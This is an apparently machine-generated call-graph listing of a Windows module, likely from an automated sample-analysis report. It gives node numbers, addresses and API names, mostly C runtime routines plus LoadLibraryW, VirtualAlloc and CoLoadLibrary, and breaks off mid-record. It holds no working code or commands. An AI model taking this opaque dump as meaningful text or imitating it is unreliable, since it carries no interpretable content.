17294->17297 17299 7fef9d3f3ca 17295->17299 17298 7fef9d3f484 17297->17298 17300 7fef9d3afb0 _fflush_nolock 17 API calls 17297->17300 17298->17293 17303 7fef9d3f561 17298->17303 17301 7fef9d3afb0 _fflush_nolock 17 API calls 17299->17301 17302 7fef9d3f44f 17300->17302 17301->17289 17302->17298 17306 7fef9d3afb0 _fflush_nolock 17 API calls 17302->17306 17304 7fef9d3afb0 _fflush_nolock 17 API calls 17303->17304 17305 7fef9d3f56e 17304->17305 17307 7fef9d3f5b8 17305->17307 17309 7fef9d3afb0 _fflush_nolock 17 API calls 17305->17309 17308 7fef9d3f461 17306->17308 17307->17283 17312 7fef9d3f604 17307->17312 17310 7fef9d3afb0 _fflush_nolock 17 API calls 17308->17310 17311 7fef9d3f580 17309->17311 17310->17298 17311->17307 17314 7fef9d3afb0 _fflush_nolock 17 API calls 17311->17314 17313 7fef9d3b530 wctomb_s 19 API calls 17312->17313 17313->17317 17315 7fef9d3f592 17314->17315 17316 7fef9d3afb0 _fflush_nolock 17 API calls 17315->17316 17316->17307 17317->17288 17320 7fef9d3afc1 17318->17320 17319 7fef9d3b04b 17319->17289 17319->17291 17320->17319 17321 7fef9d2bd70 _invalid_parameter 17 API calls 17320->17321 17321->17319 17323 7fef9d40185 17322->17323 17324 7fef9d3afb0 _fflush_nolock 17 API calls 17323->17324 17326 7fef9d401c7 17324->17326 17325 7fef9d401dc 17325->17317 17326->17325 17327 7fef9d3ab10 17 API calls 17326->17327 17328 7fef9d40326 17326->17328 17327->17328 17328->17325 17329 7fef9d39290 23 API calls 17328->17329 17329->17325 17330 7fef9d25a25 17331 7fef9d25a37 17330->17331 17332 7fef9d2bd70 _invalid_parameter 17 API calls 17331->17332 17333 7fef9d25aaf 17332->17333 18224 7fef9d34920 18227 7fef9d3d530 18224->18227 18230 7fef9d3d580 18227->18230 18231 7fef9d3d59a std::exception::_Tidy 18230->18231 18232 7fef9d3493d 18230->18232 18231->18232 18233 7fef9d3d660 std::exception::_Copy_str 17 API calls 18231->18233 18233->18232 18238 7fef9d29328 18239 7fef9d29336 EnterCriticalSection 18238->18239 18240 7fef9d2932c 18238->18240 18240->18239 18241 7fef9d3ff2d 18242 7fef9d3ff37 18241->18242 18243 7fef9d40042 18242->18243 18244 7fef9d3ff47 18242->18244 18256 7fef9d29360 LeaveCriticalSection 18243->18256 18245 7fef9d4003d 18244->18245 18248 7fef9d3ae90 _lock_file2 EnterCriticalSection 18244->18248 18247 7fef9d4004c 18249 7fef9d3ff97 18248->18249 18250 7fef9d3ffd0 18249->18250 18252 7fef9d3ffe1 18249->18252 18253 7fef9d3ffbb 18249->18253 18251 7fef9d3af60 _unlock_file2 2 API calls 18250->18251 18251->18245 18252->18250 18255 7fef9d3fd70 _fflush_nolock 25 API calls 18252->18255 18254 7fef9d3fd70 _fflush_nolock 25 API calls 18253->18254 18254->18250 18255->18250 18256->18247 18261 7fef9d2b12b 18262 7fef9d2b14c 18261->18262 18263 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18262->18263 18265 7fef9d2b2e0 18262->18265 18263->18265 18264 7fef9d2b33e 18277 7fef9d30cc0 18264->18277 18265->18264 18266 7fef9d2d490 std::exception::_Copy_str 17 API calls 18265->18266 18268 7fef9d2b311 18266->18268 18271 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18268->18271 18270 7fef9d2b37d 18275 7fef9d23280 __GSHandlerCheck 8 API calls 18270->18275 18271->18264 18272 7fef9d2cff0 terminate 34 API calls 18273 7fef9d2b373 18272->18273 18274 7fef9d27090 _exit 33 API calls 18273->18274 18274->18270 18276 7fef9d2b3a0 18275->18276 18295 7fef9d23d00 RtlEncodePointer 18277->18295 18279 7fef9d30cf6 18280 7fef9d30d23 LoadLibraryW 18279->18280 18281 7fef9d30e15 18279->18281 18282 7fef9d30d44 GetProcAddress 18280->18282 18290 7fef9d30d3d 18280->18290 18284 7fef9d30e39 DecodePointer DecodePointer 18281->18284 18292 7fef9d30e68 18281->18292 18283 7fef9d30d6a 7 API calls 18282->18283 18282->18290 18283->18281 18287 7fef9d30df3 GetProcAddress EncodePointer 18283->18287 18284->18292 18285 7fef9d30f60 DecodePointer 18285->18290 18286 7fef9d23280 __GSHandlerCheck 8 API calls 18291 7fef9d2b358 18286->18291 18287->18281 18288 7fef9d30eed DecodePointer 18289 7fef9d30f0d 18288->18289 18289->18285 18293 7fef9d30f2f DecodePointer 18289->18293 18290->18286 18291->18270 18291->18272 18292->18288 18292->18289 18294 7fef9d30ec8 18292->18294 18293->18285 18293->18294 18294->18285 18295->18279 18296 7fef9d234d5 18297 7fef9d234da _calloc_dbg 18296->18297 18298 7fef9d2350b FlsSetValue 18297->18298 18302 7fef9d23548 18297->18302 18299 7fef9d23520 18298->18299 18298->18302 18300 7fef9d23e30 LeaveCriticalSection 18299->18300 18301 7fef9d2352c GetCurrentThreadId 18300->18301 18301->18302 18303 7fef9d25ad9 18304 7fef9d25add 18303->18304 18305 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18304->18305 18306 7fef9d25b3a 18305->18306 18309 7fef9d29360 LeaveCriticalSection 18306->18309 18308 7fef9d25c14 18309->18308 17343 7fef9d233d6 17346 7fef9d288d0 HeapDestroy 17343->17346 17345 7fef9d233db 17346->17345 18321 7fef9d266da 18322 7fef9d26725 18321->18322 18325 7fef9d26745 18321->18325 18322->18325 18327 7fef9d29a70 18322->18327 18324 7fef9d2677f 18325->18324 18326 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 18325->18326 18326->18324 18329 7fef9d29a79 _updatetlocinfoEx_nolock 18327->18329 18328 7fef9d29ad8 18328->18325 18329->18328 18331 7fef9d29360 LeaveCriticalSection 18329->18331 18331->18328 18332 7fef9d268c4 18334 7fef9d268d1 18332->18334 18333 7fef9d26ba6 18350 7fef9d29360 LeaveCriticalSection 18333->18350 18334->18333 18337 7fef9d268ed _CrtIsValidPointer 18334->18337 18336 7fef9d26bb0 18338 7fef9d2695e IsBadReadPtr 18337->18338 18339 7fef9d26976 18337->18339 18348 7fef9d2692f 18337->18348 18338->18339 18340 7fef9d26ad2 18339->18340 18341 7fef9d26a29 18339->18341 18342 7fef9d26add 18340->18342 18345 7fef9d26b2d 18340->18345 18343 7fef9d26abe 18341->18343 18344 7fef9d26a86 IsBadReadPtr 18341->18344 18347 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18342->18347 18346 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18343->18346 18344->18343 18344->18348 18345->18348 18349 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 18345->18349 18346->18348 18347->18348 18349->18348 18350->18336 18351 7fef9d376c0 18352 7fef9d376cf _CrtMemDumpAllObjectsSince 18351->18352 18353 7fef9d37be3 _CrtMemDumpAllObjectsSince 18351->18353 18355 7fef9d37905 _CrtMemDumpAllObjectsSince 18352->18355 18356 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18352->18356 18364 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18352->18364 18354 7fef9d37cc6 WideCharToMultiByte 18353->18354 18353->18364 18354->18364 18357 7fef9d3790f WideCharToMultiByte 18355->18357 18360 7fef9d37827 WideCharToMultiByte 18356->18360 18359 7fef9d37965 18357->18359 18358 7fef9d23280 __GSHandlerCheck 8 API calls 18361 7fef9d37d85 18358->18361 18362 7fef9d3799a GetLastError 18359->18362 18359->18364 18360->18364 18362->18364 18365 7fef9d379d3 _CrtMemDumpAllObjectsSince 18362->18365 18363 7fef9d37a05 WideCharToMultiByte 18363->18364 18363->18365 18364->18358 18365->18363 18365->18364 17359 7fef9d2f7f1 17360 7fef9d2f80d 17359->17360 17381 7fef9d2f8de _wcsftime_l 17359->17381 17416 7fef9d36fb0 17360->17416 17362 7fef9d2fa70 17423 7fef9d369c0 17362->17423 17364 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17367 7fef9d2f85a OutputDebugStringA 17364->17367 17366 7fef9d2f9f4 17366->17362 17370 7fef9d2d490 std::exception::_Copy_str 17 API calls 17366->17370 17371 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 17367->17371 17368 7fef9d2fa8a 17369 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17368->17369 17372 7fef9d2fab7 17369->17372 17373 7fef9d2fa43 17370->17373 17375 7fef9d2f8ce 17371->17375 17377 7fef9d2fb24 17372->17377 17379 7fef9d369c0 17 API calls 17372->17379 17392 7fef9d2fb6a 17372->17392 17376 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17373->17376 17386 7fef9d23280 __GSHandlerCheck 8 API calls 17375->17386 17376->17362 17380 7fef9d369c0 17 API calls 17377->17380 17378 7fef9d2f996 17378->17366 17388 7fef9d2d490 std::exception::_Copy_str 17 API calls 17378->17388 17382 7fef9d2faf7 17379->17382 17383 7fef9d2fb3d 17380->17383 17381->17366 17381->17378 17387 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17381->17387 17384 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17382->17384 17385 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17383->17385 17384->17377 17385->17392 17389 7fef9d3011d 17386->17389 17387->17378 17390 7fef9d2f9c7 17388->17390 17391 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17390->17391 17391->17366 17393 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17392->17393 17394 7fef9d2fc39 17392->17394 17393->17394 17395 7fef9d2fc97 17394->17395 17396 7fef9d2d490 std::exception::_Copy_str 17 API calls 17394->17396 17436 7fef9d36970 17395->17436 17398 7fef9d2fc6a 17396->17398 17400 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17398->17400 17400->17395 17401 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17402 7fef9d2fd6e 17401->17402 17403 7fef9d31640 17 API calls 17402->17403 17413 7fef9d2fdbb 17402->17413 17404 7fef9d2fd8e 17403->17404 17405 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17404->17405 17405->17413 17406 7fef9d2ffef 17407 7fef9d30008 OutputDebugStringA 17406->17407 17408 7fef9d30016 17406->17408 17407->17408 17408->17375 17412 7fef9d36fb0 _itow_s 17 API calls 17408->17412 17410 7fef9d2ff03 std::exception::_Copy_str 17410->17375 17410->17406 17411 7fef9d2ffaa WriteFile 17410->17411 17411->17406 17414 7fef9d30065 17412->17414 17413->17410 17439 7fef9d29360 LeaveCriticalSection 17413->17439 17415 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17414->17415 17415->17375 17417 7fef9d37003 17416->17417 17418 7fef9d36fd6 17416->17418 17420 7fef9d37030 _itow_s 17 API calls 17417->17420 17418->17417 17419 7fef9d36fdd 17418->17419 17440 7fef9d37030 17419->17440 17422 7fef9d2f82d 17420->17422 17422->17364 17424 7fef9d369e1 17423->17424 17425 7fef9d36a42 17424->17425 17427 7fef9d36a80 _calloc_dbg_impl 17424->17427 17426 7fef9d2bd70 _invalid_parameter 17 API calls 17425->17426 17434 7fef9d36a76 _calloc_dbg_impl 17426->17434 17428 7fef9d36b6e 17427->17428 17432 7fef9d36bac _calloc_dbg_impl 17427->17432 17430 7fef9d2bd70 _invalid_parameter 17 API calls 17428->17430 17429 7fef9d36ce8 17433 7fef9d2bd70 _invalid_parameter 17 API calls 17429->17433 17430->17434 17431 7fef9d36d26 _calloc_dbg_impl 17431->17434 17435 7fef9d2bd70 _invalid_parameter 17 API calls 17431->17435 17432->17429 17432->17431 17433->17434 17434->17368 17435->17434 17456 7fef9d363e0 17436->17456 17438 7fef9d2fd20 17438->17401 17439->17410 17441 7fef9d37055 17440->17441 17442 7fef9d370ab 17441->17442 17444 7fef9d370e9 17441->17444 17443 7fef9d2bd70 _invalid_parameter 17 API calls 17442->17443 17453 7fef9d370df 17443->17453 17445 7fef9d3714a 17444->17445 17446 7fef9d37188 _calloc_dbg_impl 17444->17446 17447 7fef9d2bd70 _invalid_parameter 17 API calls 17445->17447 17448 7fef9d37287 17446->17448 17451 7fef9d372c5 17446->17451 17447->17453 17449 7fef9d2bd70 _invalid_parameter 17 API calls 17448->17449 17449->17453 17450 7fef9d37338 17452 7fef9d2bd70 _invalid_parameter 17 API calls 17450->17452 17451->17450 17454 7fef9d37376 17451->17454 17452->17453 17453->17422 17454->17453 17455 7fef9d2bd70 _invalid_parameter 17 API calls 17454->17455 17455->17453 17457 7fef9d3640e 17456->17457 17458 7fef9d3648e 17457->17458 17460 7fef9d364cc _calloc_dbg_impl 17457->17460 17459 7fef9d2bd70 _invalid_parameter 17 API calls 17458->17459 17466 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17459->17466 17461 7fef9d3668e _CrtMemDumpAllObjectsSince 17460->17461 17462 7fef9d3663f 17460->17462 17468 7fef9d35ea0 17461->17468 17464 7fef9d2bd70 _invalid_parameter 17 API calls 17462->17464 17464->17466 17465 7fef9d366b5 _calloc_dbg_impl 17465->17466 17467 7fef9d2bd70 _invalid_parameter 17 API calls 17465->17467 17466->17438 17467->17466 17469 7fef9d35ecf 17468->17469 17470 7fef9d35fae 17469->17470 17471 7fef9d35f6e 17469->17471 17478 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 17469->17478 17472 7fef9d35fcf _CrtMemDumpAllObjectsSince 17470->17472 17473 7fef9d362e1 _CrtMemDumpAllObjectsSince 17470->17473 17474 7fef9d2bd70 _invalid_parameter 17 API calls 17471->17474 17476 7fef9d360a1 MultiByteToWideChar 17472->17476 17472->17478 17475 7fef9d3632f MultiByteToWideChar 17473->17475 17473->17478 17474->17478 17475->17478 17477 7fef9d3610e GetLastError 17476->17477 17476->17478 17477->17478 17479 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 17477->17479 17478->17465 17479->17478 17480 7fef9d36238 MultiByteToWideChar 17479->17480 17480->17478 16448 7fef9d26ff2 16449 7fef9d26ffe 16448->16449 16452 7fef9d2ca00 16449->16452 16451 7fef9d27011 _initterm_e 16455 7fef9d2ca0e 16452->16455 16453 7fef9d2ca23 EncodePointer 16453->16455 16454 7fef9d2ca4b 16454->16451 16455->16453 16455->16454 18421 7fef9d3e2fc 18422 7fef9d3e309 get_int64_arg _get_printf_count_output 18421->18422 18423 7fef9d3e38c 18422->18423 18424 7fef9d3e3e1 18422->18424 18428 7fef9d2bd70 _invalid_parameter 17 API calls 18423->18428 18425 7fef9d3eadf 18424->18425 18426 7fef9d3eec0 25 API calls 18424->18426 18435 7fef9d3da75 18424->18435 18427 7fef9d3ef10 25 API calls 18425->18427 18426->18425 18429 7fef9d3eafd 18427->18429 18441 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18428->18441 18430 7fef9d3eb33 18429->18430 18432 7fef9d3eec0 25 API calls 18429->18432 18431 7fef9d3ec29 18430->18431 18445 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18430->18445 18433 7fef9d3ebda 18431->18433 18434 7fef9d3ef10 25 API calls 18431->18434 18432->18430 18433->18435 18440 7fef9d3eec0 25 API calls 18433->18440 18434->18433 18437 7fef9d3eca1 18435->18437 18442 7fef9d3dbb5 18435->18442 18436 7fef9d23280 __GSHandlerCheck 8 API calls 18438 7fef9d3ed9e 18436->18438 18439 7fef9d2bd70 _invalid_parameter 17 API calls 18437->18439 18437->18441 18439->18441 18440->18435 18441->18436 18444 7fef9d2bd70 _invalid_parameter 17 API calls 18442->18444 18443 7fef9d3f000 wcsxfrm 2 API calls 18443->18445 18444->18441 18445->18433 18445->18443 18446 7fef9d3ee40 25 API calls 18445->18446 18446->18445 17485 7fef9d253fb 17486 7fef9d2541d _realloc_dbg 17485->17486 17488 7fef9d25421 17486->17488 17491 7fef9d26380 17486->17491 17489 7fef9d254de _calloc_dbg_impl _realloc_dbg 17495 7fef9d2c020 17489->17495 17492 7fef9d26391 17491->17492 17493 7fef9d26395 _CrtIsValidPointer 17491->17493 17492->17489 17493->17492 17494 7fef9d263b6 HeapValidate 17493->17494 17494->17492 17496 7fef9d2c039 _get_errno_from_oserr 17495->17496 17497 7fef9d2c03b HeapFree 17495->17497 17496->17488 17497->17496 17498 7fef9d2c05a GetLastError 17497->17498 17498->17496 16521 7fef9d235e1 16522 7fef9d235f1 16521->16522 16526 7fef9d235ea 16521->16526 16522->16526 16527 7fef9d212b0 16522->16527 16525 7fef9d212b0 14 API calls 16525->16526 16528 7fef9d212de CoLoadLibrary 16527->16528 16534 7fef9d22f8c 16527->16534 16530 7fef9d22f0f MessageBoxA ExitProcess 16528->16530 16531 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16528->16531 16529 7fef9d23280 __GSHandlerCheck 8 API calls 16532 7fef9d230ff 16529->16532 16533 7fef9d22f73 _calloc_dbg_impl 16531->16533 16531->16534 16532->16525 16532->16526 16535 7fef9d22f83 CoTaskMemFree 16533->16535 16534->16529 16535->16534 17499 7fef9d23fe1 17500 7fef9d23fea SetLastError 17499->17500 16536 7fef9d27de0 16537 7fef9d27ded 16536->16537 16539 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16536->16539 16543 7fef9d2aa40 16537->16543 16540 7fef9d27e0e 16539->16540 16547 7fef9d2d490 16539->16547 16557 7fef9d27ff0 16539->16557 16544 7fef9d2aa4d 16543->16544 16546 7fef9d2aa57 16543->16546 16561 7fef9d29c10 16544->16561 16546->16539 16549 7fef9d2d4b1 16547->16549 16548 7fef9d2d512 16550 7fef9d2bd70 _invalid_parameter 17 API calls 16548->16550 16549->16548 16551 7fef9d2d550 _calloc_dbg_impl 16549->16551 16553 7fef9d2d546 _calloc_dbg_impl 16550->16553 16552 7fef9d2d63e 16551->16552 16555 7fef9d2d67c _calloc_dbg_impl 16551->16555 16554 7fef9d2bd70 _invalid_parameter 17 API calls 16552->16554 16553->16539 16554->16553 16555->16553 16556 7fef9d2bd70 _invalid_parameter 17 API calls 16555->16556 16556->16553 16558 7fef9d28010 16557->16558 16559 7fef9d2800e 16557->16559 16560 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16558->16560 16559->16539 16560->16559 16562 7fef9d29c2a 16561->16562 16571 7fef9d29b10 16562->16571 16564 7fef9d29c34 16575 7fef9d29f20 16564->16575 16566 7fef9d29c51 16568 7fef9d29ecd 16566->16568 16581 7fef9d2a000 16566->16581 16568->16546 16569 7fef9d29ce8 16569->16568 16594 7fef9d29360 LeaveCriticalSection 16569->16594 16572 7fef9d29b19 16571->16572 16574 7fef9d29bde 16572->16574 16595 7fef9d29360 LeaveCriticalSection 16572->16595 16574->16564 16576 7fef9d29f49 16575->16576 16577 7fef9d29f81 16576->16577 16578 7fef9d29f5b GetOEMCP 16576->16578 16579 7fef9d29f88 GetACP 16577->16579 16580 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16577->16580 16578->16580 16579->16580 16580->16566 16582 7fef9d29f20 __initmbctable 2 API calls 16581->16582 16583 7fef9d2a028 16582->16583 16584 7fef9d2a234 16583->16584 16589 7fef9d2a039 __initmbctable 16583->16589 16590 7fef9d2a08e __initmbctable 16583->16590 16586 7fef9d2a25d IsValidCodePage 16584->16586 16584->16589 16585 7fef9d23280 __GSHandlerCheck 8 API calls 16587 7fef9d2a470 16585->16587 16588 7fef9d2a27b GetCPInfo 16586->16588 16586->16589 16587->16569 16588->16589 16592 7fef9d2a295 __initmbctable 16588->16592 16589->16585 16596 7fef9d2a5e0 GetCPInfo 16590->16596 16593 7fef9d2a5e0 __initmbctable 19 API calls 16592->16593 16593->16589 16594->16568 16595->16574 16600 7fef9d2a61f 16596->16600 16605 7fef9d2a7dc 16596->16605 16597 7fef9d23280 __GSHandlerCheck 8 API calls 16598 7fef9d2aa30 16597->16598 16598->16589 16599 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16601 7fef9d2a734 16599->16601 16600->16599 16607 7fef9d2ef00 16601->16607 16603 7fef9d2a788 16604 7fef9d2ef00 __initmbctable 7 API calls 16603->16604 16604->16605 16605->16597 16606 7fef9d2a80a 16605->16606 16606->16589 16608 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16607->16608 16611 7fef9d2efb0 16608->16611 16610 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16610->16603 16612 7fef9d2efd4 __initmbctable 16611->16612 16613 7fef9d2f068 MultiByteToWideChar 16612->16613 16614 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16613->16614 16619 7fef9d2f0ac malloc _MarkAllocaS 16613->16619 16614->16610 16615 7fef9d2f122 MultiByteToWideChar 16615->16614 16616 7fef9d2f164 LCMapStringW 16615->16616 16616->16614 16617 7fef9d2f1a8 16616->16617 16618 7fef9d2f1b8 16617->16618 16625 7fef9d2f222 malloc _MarkAllocaS 16617->16625 16618->16614 16620 7fef9d2f1d9 LCMapStringW 16618->16620 16619->16614 16619->16615 16620->16614 16621 7fef9d2f2ac LCMapStringW 16621->16614 16622 7fef9d2f2ea 16621->16622 16623 7fef9d2f341 WideCharToMultiByte 16622->16623 16624 7fef9d2f2f4 WideCharToMultiByte 16622->16624 16623->16614 16624->16614 16625->16614 16625->16621 18462 7fef9d312e3 LoadLibraryW 18463 7fef9d31304 GetProcAddress 18462->18463 18464 7fef9d312fd 18462->18464 18463->18464 18465 7fef9d3132a 7 API calls 18463->18465 18468 7fef9d23280 __GSHandlerCheck 8 API calls 18464->18468 18466 7fef9d313b3 GetProcAddress EncodePointer 18465->18466 18467 7fef9d313d5 18465->18467 18466->18467 18470 7fef9d313f9 DecodePointer DecodePointer 18467->18470 18472 7fef9d31428 DecodePointer 18467->18472 18469 7fef9d3157a 18468->18469 18470->18472 18472->18464 18477 7fef9d344e5 18478 7fef9d3445a __SehTransFilter 18477->18478 18482 7fef9d3466c __SehTransFilter 18478->18482 18484 7fef9d35180 __SehTransFilter 38 API calls 18478->18484 18479 7fef9d347d7 18480 7fef9d3485b 18479->18480 18481 7fef9d2cf80 _inconsistency 36 API calls 18479->18481 18481->18480 18482->18479 18483 7fef9d35bb0 __SehTransFilter 36 API calls 18482->18483 18485 7fef9d34727 18483->18485 18484->18478 18485->18479 18486 7fef9d2e500 __SetUnwindTryBlock 37 API calls 18485->18486 18487 7fef9d34767 18486->18487 18488 7fef9d2edc0 __SehTransFilter 9 API calls 18487->18488 18488->18479 17501 7fef9d3bfde 17511 7fef9d3c00c 17501->17511 17502 7fef9d3b99c 17503 7fef9d3cc93 17502->17503 17508 7fef9d3bada 17502->17508 17505 7fef9d2bd70 _invalid_parameter 17 API calls 17503->17505 17506 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17503->17506 17504 7fef9d3b530 wctomb_s 19 API calls 17504->17511 17505->17506 17507 7fef9d23280 __GSHandlerCheck 8 API calls 17506->17507 17509 7fef9d3cd90 17507->17509 17510 7fef9d2bd70 _invalid_parameter 17 API calls 17508->17510 17510->17506 17511->17502 17511->17504 17512 7fef9d35de0 17517 7fef9d23170 17512->17517 17514 7fef9d35e86 17518 7fef9d231ac 17517->17518 17519 7fef9d23280 __GSHandlerCheck 8 API calls 17518->17519 17520 7fef9d23263 17519->17520 17520->17514 17521 7fef9d23870 17520->17521 17522 7fef9d239db __SehTransFilter 17521->17522 17524 7fef9d238de __SehTransFilter 17521->17524 17522->17514 17523 7fef9d23a71 RtlUnwindEx 17523->17522 17524->17522 17524->17523 17525 7fef9d3ade0 17530 7fef9d3fee0 17525->17530 17528 7fef9d3adf9 17540 7fef9d3ff00 17530->17540 17532 7fef9d3ade9 17532->17528 17533 7fef9d3fc70 17532->17533 17539 7fef9d3fc86 17533->17539 17534 7fef9d3fd59 17607 7fef9d29360 LeaveCriticalSection 17534->17607 17536 7fef9d3fd63 17536->17528 17537 7fef9d3fd09 DeleteCriticalSection 17537->17539 17539->17534 17539->17537 17596 7fef9d40580 17539->17596 17541 7fef9d3ff22 17540->17541 17542 7fef9d40042 17541->17542 17543 7fef9d3ff47 17541->17543 17573 7fef9d29360 LeaveCriticalSection 17542->17573 17544 7fef9d4003d 17543->17544 17555 7fef9d3ae90 17543->17555 17544->17532 17546 7fef9d4004c 17546->17532 17548 7fef9d3ff97 17549 7fef9d3ffd0 17548->17549 17551 7fef9d3ffe1 17548->17551 17552 7fef9d3ffbb 17548->17552 17568 7fef9d3af60 17549->17568 17551->17549 17554 7fef9d3fd70 _fflush_nolock 25 API calls 17551->17554 17558 7fef9d3fd70 17552->17558 17554->17549 17556 7fef9d3aec8 EnterCriticalSection 17555->17556 17557 7fef9d3aea4 17555->17557 17556->17557 17557->17548 17559 7fef9d3fd81 17558->17559 17560 7fef9d3fd8a 17558->17560 17561 7fef9d3ff00 _fflush_nolock 25 API calls 17559->17561 17574 7fef9d3fdf0 17560->17574 17563 7fef9d3fd88 17561->17563 17563->17549 17564 7fef9d3fd94 17564->17563 17565 7fef9d3afb0 _fflush_nolock 17 API calls 17564->17565 17566 7fef9d3fdba 17565->17566 17578 7fef9d407c0 17566->17578 17569 7fef9d3af74 17568->17569 17570 7fef9d3af98 LeaveCriticalSection 17568->17570 17595 7fef9d29360 LeaveCriticalSection 17569->17595 17572 7fef9d3af96 17570->17572 17572->17544 17573->17546 17575 7fef9d3fe1f 17574->17575 17577 7fef9d3fe5d 17574->17577 17576 7fef9d3afb0 _fflush_nolock 17 API calls 17575->17576 17575->17577 17576->17577 17577->17564 17579 7fef9d407d3 17578->17579 17581 7fef9d407e8 17578->17581 17579->17563 17580 7fef9d40851 17582 7fef9d2bd70 _invalid_parameter 17 API calls 17580->17582 17581->17580 17587 7fef9d4088f 17581->17587 17582->17579 17583 7fef9d40913 17588 7fef9d2bd70 _invalid_parameter 17 API calls 17583->17588 17584 7fef9d40951 17585 7fef9d3fae0 _fflush_nolock 3 API calls 17584->17585 17586 7fef9d4095a 17585->17586 17589 7fef9d3f900 _fflush_nolock 17 API calls 17586->17589 17592 7fef9d409ab __doserrno 17586->17592 17587->17583 17587->17584 17588->17579 17590 7fef9d40992 FlushFileBuffers 17589->17590 17591 7fef9d4099f GetLastError 17590->17591 17590->17592 17591->17592 17594 7fef9d3fbc0 LeaveCriticalSection 17592->17594 17594->17579 17595->17572 17597 7fef9d40599 17596->17597 17598 7fef9d405ef 17597->17598 17599 7fef9d4062a 17597->17599 17601 7fef9d2bd70 _invalid_parameter 17 API calls 17598->17601 17603 7fef9d40623 17599->17603 17608 7fef9d3ae10 17599->17608 17601->17603 17602 7fef9d40651 17612 7fef9d40680 17602->17612 17603->17539 17605 7fef9d4065c 17623 7fef9d3aee0 17605->17623 17607->17536 17609 7fef9d3ae77 EnterCriticalSection 17608->17609 17610 7fef9d3ae27 17608->17610 17611 7fef9d3ae3b 17609->17611 17610->17609 17610->17611 17611->17602 17613 7fef9d40699 17612->17613 17614 7fef9d406ef 17613->17614 17615 7fef9d4072d 17613->17615 17619 7fef9d2bd70 _invalid_parameter 17 API calls 17614->17619 17616 7fef9d40723 17615->17616 17617 7fef9d3fdf0 _fflush_nolock 17 API calls 17615->17617 17616->17605 17618 7fef9d40752 17617->17618 17620 7fef9d3afb0 _fflush_nolock 17 API calls 17618->17620 17619->17616 17621 7fef9d4076a 17620->17621 17629 7fef9d40a20 17621->17629 17624 7fef9d3af47 LeaveCriticalSection 17623->17624 17625 7fef9d3aef7 17623->17625 17627 7fef9d3af45 17624->17627 17625->17624 17626 7fef9d3af0b 17625->17626 17665 7fef9d29360 LeaveCriticalSection 17626->17665 17627->17603 17630 7fef9d40a53 17629->17630 17636 7fef9d40a33 __doserrno 17629->17636 17631 7fef9d40abc __doserrno 17630->17631 17632 7fef9d40b05 17630->17632 17634 7fef9d2bd70 _invalid_parameter 17 API calls 17631->17634 17633 7fef9d40bd2 17632->17633 17638 7fef9d40b89 __doserrno 17632->17638 17635 7fef9d3fae0 _fflush_nolock 3 API calls 17633->17635 17634->17636 17637 7fef9d40bdb 17635->17637 17636->17616 17641 7fef9d40c13 17637->17641 17643 7fef9d40c80 17637->17643 17640 7fef9d2bd70 _invalid_parameter 17 API calls 17638->17640 17640->17636 17656 7fef9d3fbc0 LeaveCriticalSection 17641->17656 17644 7fef9d3f900 _fflush_nolock 17 API calls 17643->17644 17647 7fef9d40c91 17644->17647 17645 7fef9d40d05 17657 7fef9d3f7d0 17645->17657 17647->17645 17648 7fef9d3f900 _fflush_nolock 17 API calls 17647->17648 17655 7fef9d40ce5 17647->17655 17651 7fef9d40cd6 17648->17651 17649 7fef9d3f900 _fflush_nolock 17 API calls 17650 7fef9d40cf8 CloseHandle 17649->17650 17650->17645 17652 7fef9d40d0f GetLastError 17650->17652 17654 7fef9d3f900 _fflush_nolock 17 API calls 17651->17654 17652->17645 17653 7fef9d40d22 _dosmaperr 17653->17641 17654->17655 17655->17645 17655->17649 17656->17636 17658 7fef9d3f878 __doserrno 17657->17658 17659 7fef9d3f7e3 17657->17659 17658->17653 17659->17658 17660 7fef9d3f87a SetStdHandle 17659->17660 17661 7fef9d3f86a 17659->17661 17660->17658 17662 7fef9d3f871 17661->17662 17663 7fef9d3f889 SetStdHandle 17661->17663 17662->17658 17664 7fef9d3f898 SetStdHandle 17662->17664 17663->17658 17664->17658 17665->17627 18512 7fef9d348e0 18513 7fef9d348f7 std::bad_exception::~bad_exception 18512->18513 18514 7fef9d3490c 18513->18514 18515 7fef9d3d710 _Ref_count LeaveCriticalSection 18513->18515 18515->18514 18516 7fef9d27ae3 18519 7fef9d27af3 18516->18519 18517 7fef9d27ce0 SetHandleCount 18525 7fef9d27c74 18517->18525 18518 7fef9d27c7b 18518->18517 18519->18517 18519->18518 18520 7fef9d27b95 GetStdHandle 18519->18520 18520->18518 18521 